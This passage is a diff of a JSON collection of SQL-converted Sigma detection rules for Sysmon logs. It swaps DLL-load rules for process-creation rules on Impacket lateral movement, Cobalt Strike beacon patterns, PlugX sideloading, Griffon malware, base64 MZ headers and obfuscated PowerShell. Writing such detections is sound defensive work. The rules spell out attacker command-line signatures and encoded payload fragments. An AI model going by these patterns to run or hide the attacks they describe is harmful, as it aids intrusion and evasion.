Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", + "status": "experimental", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1059" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.initial_access", "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "status": "experimental", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": "test", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "status": "test", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1027", + 